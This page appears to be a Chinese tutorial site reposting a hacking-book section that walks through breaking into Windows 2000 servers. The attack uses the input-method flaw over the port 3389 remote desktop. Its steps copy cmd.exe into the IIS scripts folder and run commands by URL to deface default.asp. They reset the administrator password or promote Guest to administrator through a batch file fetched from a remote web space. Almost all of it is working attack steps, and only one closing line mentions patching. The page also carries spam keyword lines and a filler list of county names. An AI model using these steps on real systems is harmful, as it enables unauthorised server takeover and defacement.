人人做人人澡人人爽欧美,国产主播一区二区,久久久精品五月天,羞羞视频在线观看免费

當前位置:蘿卜系統 > 網絡技術教程 > 詳細頁面

黑客攻防技術內幕-防范入侵的辦法(5)

黑客攻防技術內幕-防范入侵的辦法(5)

更新時間:2022-04-28 文章作者:未知 信息來源:網絡 閱讀次數:

網絡技術是從1990年代中期發展起來的新技術,它把互聯網上分散的資源融為有機整體,實現資源的全面共享和有機協作,使人們能夠透明地使用資源的整體能力并按需獲取信息。資源包括高性能計算機、存儲資源、數據資源、信息資源、知識資源、專家資源、大型數據庫、網絡、傳感器等。 當前的互聯網只限于信息共享,網絡則被認為是互聯網發展的第三階段。
6.2 基于3389端口結合輸入法漏洞入侵(2)

    

6.2.2  通過輸入法漏洞簡單更改目標服務器的主頁

(1) 在如圖6-36所示的【跳至URL】對話框中輸入D:\winnt\system32\cmd.exe(這里是Win2k安裝在D),單擊【確定】按鈕,如圖6-36所示。

6-36  輸入CMD程序路徑

(2) 此時會出現下載CMD.exe程序對話框,如圖6-37所示。

6-37  下載CMD程序

(3) 在【文件下載】對話框中選擇【將該程序保存到磁盤】單選按鈕,單擊【確定】按鈕將CMD保存到d:\inetpub\scripts目錄下,如圖6-38所示。

6-38  CMD程序保存到Scripts目錄下

(4) 在如圖6-36所示的【跳至URL】中輸入http://127.0.0.1/scripts/cmd.exe?/c+dir+d:\,可以列出D盤目錄,如圖6-39所示。

6-39  列出D盤目錄

注意:

也可在本地機的瀏覽器中輸入http://127.0.0.1/scripts/cmd.exe?/c+dir+d:\ 如圖6-40   所示。

6-40  在本地瀏覽器中列出目標機D盤目標

(5) 在圖6-36所示的【跳至URL】對話框或本地瀏覽器中輸入如下請求,就可以達到簡單地更改目標服務器主頁的目的:

http://127.0.0.1/scripts/cmd".exe?/c+echo+網站有漏洞+>d:\inetpub\wwwroot\default.asp

如圖6-41所示。

6-41  更改目標服務器主頁

(6) 獲得Administrators組權限可圖6-36所示的【跳至URL】對話框或在本地瀏覽器中輸入如下請求:

http://127.0.0.1/scripts/cmd".exe?/c echo net user administrator ffhh>3389.bat

說明:

利用回顯命令與管道命令相結合將net user administrator ffhh(Administrator的密碼更改為ffhh)輸入到目標服務器Scripts目錄下,文件名為3389.bat,如圖6-42所示。

6-42  建立3389.bat

(7) 返回到圖6-36所示的【跳至URL】對話框中輸入d:\inetpub\scripts\3389.bat,單擊【確定】按鈕,在【文件下載】對話框中選擇【在當前位置運行該程序】單選按鈕,單擊【確定】按鈕運行,如圖6-43所示。

6-43  下載3389.bat文件

(8) 以用戶名Administrator,密碼ffhh 登錄,入侵成功!

6.2.3  通過輸入法漏洞來獲得目標機Administrators組的權限

(1) 打開記事本,輸入如下命令:

net user administrator ffhh

命令解釋:

Administrator的密碼更改為:ffhh

或是:

net user guest /active:yes           

net user guest ffhh

net localgroup administrators guest /add

命令解釋:

net user guest /active:yes是將用戶名Guest激活。

net user guest ffhh Guset的密碼設為ffhh

net localgroup administrators guest /add Guest添加到超級用戶組里。

如圖6-44所示。

6-44  在記事本里輸入命令

(2) 選擇【文件】→【另存為】命令,在【另存為】對話框中,將剛建立的文件另存為名為3389.bat的文件,單擊【保存】按鈕即可。

(3) 3389.bat上傳到免費個人主頁空間中(比如:163個人主頁空間、8u8個人主頁空間等)。這里將3389.bat上傳至http://127.0.0.1下,其路徑即為http://127.0.0.1/3389.bat

(4) 接入侵測試()如圖6-36所示的【跳至URL】對話框中輸入http://127.0.0.1/ 3389.bat

(5) 單擊【確定】按鈕,在【文件下載】對話框中選擇【在當前位置運行該程序】單選按鈕,單擊【確定】按鈕,將運行3389.bat中的命令,如圖6-45所示。

6-45  執行3389.bat

(6) 3389.bat運行完畢后,關閉輸入法幫助文件窗口,以用戶名guest,密碼ffhh登錄,此時的Guest為超級用戶,如圖6-46所示。

6-46  通過3389端口登錄到Win2K服務器

(7) 入侵測試成功!

提示:

如果在使用3389端口登錄,在調出輸入法幫助文件時,幫助命令呈現灰色,表明對方服務器已打了輸入法漏洞的補丁。



網絡的神奇作用吸引著越來越多的用戶加入其中,正因如此,網絡的承受能力也面臨著越來越嚴峻的考驗―從硬件上、軟件上、所用標準上......,各項技術都需要適時應勢,對應發展,這正是網絡迅速走向進步的催化劑。

溫馨提示:喜歡本站的話,請收藏一下本站!

本類教程下載

系統下載排行

網站地圖xml | 網站地圖html
主站蜘蛛池模板: 大方县| 六枝特区| 平阳县| 荆门市| 桃园市| 罗甸县| 阿拉善盟| 宁陵县| 万全县| 阿巴嘎旗| 大埔区| 盐源县| 砀山县| 梁平县| 增城市| 荣昌县| 浑源县| 吉隆县| 苍山县| 五家渠市| 黎平县| 东至县| 神农架林区| 弥勒县| 朝阳县| 瑞金市| 犍为县| 石嘴山市| 义马市| 福贡县| 延寿县| 永顺县| 平南县| 阳泉市| 桃园县| 喀喇沁旗| 灵丘县| 屯昌县| 湄潭县| 荣昌县| 湖南省|